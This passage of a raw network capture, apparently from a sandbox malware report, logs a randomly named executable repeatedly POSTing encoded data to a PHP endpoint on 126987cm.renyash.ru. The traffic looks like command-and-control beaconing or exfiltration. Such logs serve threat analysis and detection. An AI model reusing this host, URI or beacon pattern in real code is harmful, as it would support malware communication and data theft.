                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                 Jan 1, 2025 21:48:03.946969032 CET | 1072 | OUT | Data Raw: 51 55 5b 50 56 47 59 55 5d 56 5b 57 54 54 51 5d 58 57 58 58 5b 5f 57 48 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QU[PVGYU]V[WTTQ]XWXX[_WHVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!^3<#. >3#;'W(;Q5W031=6&?.$X'*!^&%X*
                                                                                                                                 Jan 1, 2025 21:48:04.044361115 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                 Jan 1, 2025 21:48:04.320518017 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:04 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7v4LciX7xKGRkW9gx47BLt0VWUQKe48LlsUmwZ3g0khIxQ8zJCzP07oy1zoAcBvBjvbBvXC%2FnrAnahZgqChCbs77GeMdadoPaIN0Nij9uz4k2cE8ZCA0AHLcX6tuxiUA01WIy%2BW3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e38fc2742be-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3141&min_rtt=1604&rtt_var=3676&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=105005&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                 51 | 192.168.2.4 | 49852 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                                                                 Jan 1, 2025 21:48:04.439456940 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                 Jan 1, 2025 21:48:04.796029091 CET | 1072 | OUT | Data Raw: 51 53 5b 56 56 46 5c 54 5d 56 5b 57 54 55 51 5e 58 55 58 5c 5b 53 57 47 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QS[VVF\T]V[WTUQ^XUX\[SWGVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["0;7%]6+3+5$(B'T68R03.Z>>+8%!^&%X*
Jan 1, 2025 21:48:04.882723093 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:05.141120911 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:05 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gaSO%2BC3wBuAuBbcb37surSernvKckyHnBvIPQB3G8eFq25lRmj1J7nblYwRJxy%2FBU6Rzi39FdFL0ozo4O8B3dXMqsCXmlcZq%2BpA%2BYcWV6PqvuhjRItPDVRZv6c8MHH7NkfYPlY8S"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e3e3a8043ad-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2269&min_rtt=1643&rtt_var=1868&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=219515&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 49862 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:05.273777008 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:05.624308109 CET | 1072 | OUT
Jan 1, 2025 21:48:05.727385044 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:05.903098106 CET | 795 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:05 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jdDJwc5Tk32x1L7xHDB814VSAViFk1VDPwB5IA%2Bv66WQRGLPyG6Mh8pxnWUCgmHurAeqWLupRAWtQ8qyj39iX2aq5uneCWThfKw5MVoTsbjlVKxNaY4oNO9hACmkBFGrLn7fEo5g"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e437ad143b9-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3896&min_rtt=2025&rtt_var=4502&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=85897&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a
                                                                                                                                Data Ascii: 40VX[
Jan 1, 2025 21:48:05.991393089 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.4 | 49869 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:06.125372887 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:06.530967951 CET | 1072 | OUT
Jan 1, 2025 21:48:06.575004101 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:06.878063917 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:06 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8hIGZjrCv2%2Fa%2Fx0mTIrqFH4ft7Bz3qYNlPb8XL2r7oPZY9nD28qea2SAgLz1BPFkn154tj6f6eq9HkgLEHxi8qCSkhajogGwVfSxxphMY8d7OpKms7k5qGnvnOG%2BaPaEztIMP%2FEt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e48b82441ec-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3797&min_rtt=1583&rtt_var=5023&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=75643&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.4 | 49875 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:07.021132946 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1064
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:07.374140024 CET | 1064 | OUT
Jan 1, 2025 21:48:07.466110945 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:07.720835924 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:07 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mC5FyvmFQX9tEjfgwCFKH8%2FW7l6Z1%2BUAU4XWd8KtrXLaSi7a1IXDuSHpC8aoVBSvKH7Avv4rGLsPGv6oJq%2Fng7fMKvQBBY1naP4rQIBqmZfTl2OtcfrI7yxYgGT7cvu7NdjisIjC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e4e58467c8d-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1920&min_rtt=1790&rtt_var=932&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1409&delivery_rate=514809&cwnd=184&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 49881 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:07.842525959 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:08.186640978 CET | 1072 | OUT


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 49882 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:08.193043947 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:08.546025991 CET | 1788 | OUT
Jan 1, 2025 21:48:08.667346954 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:08.838882923 CET | 957 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:08 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OBYQRalaFnPXVcXDp%2F7yz7nepMBdtQnoWC70vg1qP8Y4IJEoUsA46cuBMNFCl7eZKBHglGZKG3SlnR6V%2Bg6KwbBvCGA7hJ4j6uAk4x5V%2F9A5IqG%2FiremGPGdb2hwznP7DEx66%2BeA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e55da27de98-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3488&min_rtt=1643&rtt_var=4308&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=88970&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.4 | 49885 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:08.315249920 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:08.671021938 CET | 1072 | OUT
Jan 1, 2025 21:48:08.758801937 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:09.023783922 CET | 801 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:08 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cn92t2iHszpLtir0idL8aqoaTnKtEQKsnCUrLwfC5LWVXnlbjeNS68m3SBjR%2Fe5b6NtRz9DbOWBe6NtzSANBdEVRW88jPVRw7MNAoSDJnlsuyk03WMOmSzlM340Dyn9aNcP70iEH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e567cbd0c96-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2134&min_rtt=1647&rtt_var=1593&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=263110&cwnd=152&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                58 | 192.168.2.4 | 49894 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:09.162414074 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:09.532507896 CET | 1072 | OUT | Data Raw: 54 5f 5b 53 56 43 5c 55 5d 56 5b 57 54 5f 51 52 58 51 58 58 5b 53 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T_[SVC\U]V[WT_QRXQXX[SWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!X'3Z7. >\'.86;S+7U!S$ *=@<X81!^&%X*+
                                                                                                                                Jan 1, 2025 21:48:09.614173889 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:09.871818066 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:09 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wcyBWBAp%2BB7bIu9P8Qod3YfVYMHqarAJN5b5MuG1jg%2FH%2BV0hQ7QlAXO5Gndi4BmocjV2qeeY3LLwsVqlcRRPhFp%2BswjAzswUrTk4H2LZfOcc1r6%2BS7QR%2F9aenLZI5MnNrqZeYntt"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e5bce60f5fa-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3038&min_rtt=1566&rtt_var=3531&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=109428&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                59 | 192.168.2.4 | 49900 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:10.285330057 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:10.639862061 CET | 1072 | OUT | Data Raw: 54 54 5e 53 53 43 5c 55 5d 56 5b 57 54 5a 51 5c 58 55 58 58 5b 54 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TT^SSC\U]V[WTZQ\XUXX[TWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!$3#T=[ -7]'= 6;?T5'$02[*5!C<>'%*!^&%X*?
                                                                                                                                Jan 1, 2025 21:48:10.763979912 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:10.951622009 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:10 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e3HbJ7KoN7Xwue7c1BbffZl6ZQ6A0CcNJifkMb%2B6Gim4RRoSUuC8Ml8%2FQyHtqXaUojzJMqVG%2BI6driitQIjIkSjLjHj%2FXF1TyHiRE%2BYLfiD0q%2Bn%2FwTOfw7Nor7jyBpwhPA6HsrUR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e62f8998c18-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7471&min_rtt=1804&rtt_var=12012&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=30967&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a
                                                                                                                                Data Ascii: 40VX[
                                                                                                                                Jan 1, 2025 21:48:11.043833971 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                60 | 192.168.2.4 | 49906 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:11.186532974 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:11.546365023 CET | 1072 | OUT | Data Raw: 54 53 5b 57 56 40 5c 55 5d 56 5b 57 54 5b 51 5b 58 53 58 5b 5b 5e 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TS[WV@\U]V[WT[Q[XSX[[^WAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["3#Y#-Y68$= 6;<?'#W#5;'0*>(02*!^&%X*
                                                                                                                                Jan 1, 2025 21:48:11.630685091 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:11.854441881 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:11 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xdYYHrjPlabKF%2BEcPE0V0hWN6Uvj0pY4t7LLtGAlBPCKmalA1VAQoesuYo%2Fh88Eq3u7882y%2FN%2BThRFRT6Az8ujfJfar3G521Ajqtg13P%2FtoLe2FkIR%2BDbecb5KE4d8JH8ifVuAa3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55e686bda437e-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2569&min_rtt=1594&rtt_var=2548&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=155401&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                61 | 192.168.2.4 | 49912 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:11.986201048 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
